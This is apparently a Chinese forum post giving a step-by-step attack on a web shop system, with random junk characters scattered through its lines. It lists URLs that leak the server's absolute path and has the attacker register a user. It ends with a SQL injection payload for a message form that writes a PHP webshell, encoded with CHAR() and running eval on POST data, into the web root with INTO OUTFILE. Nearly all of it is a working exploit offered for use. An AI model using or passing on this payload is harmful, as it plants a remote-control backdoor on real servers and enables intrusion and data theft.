第一个:想办法找到目标网站的绝对路径% O; z; ^) t9 n! L, d- p$ F# I
7 P' ?3 W) \7 khttp://www.political-security.com/install/svinfo.php?phpinfo=true C0 E+ U/ M% n, z1 \
0 o$ j; X( T) {1 z4 y) D7 J
http:/www.political-security.com/core/api/shop_api.php
0 Q! `4 h$ w- x G3 A \: L: ^/ b0 F) R( d
http://www.political-security.co ... api_b2b_2_0_cat.php
% }, f! V& W- j4 F4 A" Y( E4 J. v/ ]/ R# z% S
http://www.political-security.com/core/ap ... b_2_0_goodstype.php2 `8 \" U' N. H0 Y8 O) C
5 t+ P! v P% J% Z
http://www.political-security.co ... i_b2b_2_0_brand.php8 t1 H/ Q- s# j% x F% w6 |8 F2 c
第二个:注册一个普通用户
& I) g; c, O/ z
! i# D8 @: w! xhttp://www.political-security.com/?passport-signup.html: \2 P9 ?" u% M! m9 w4 o; t
# }" A9 x2 `" t* [' j4 R
第三个: 发送消息
9 w' ], W( h* \
& P( o, ]! V; [http://www.political-security.com/?member-send.html0 r0 M$ S2 @; g+ e y
发送给中填写
( R5 N6 U2 n) W8 o5 P4 Pantian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |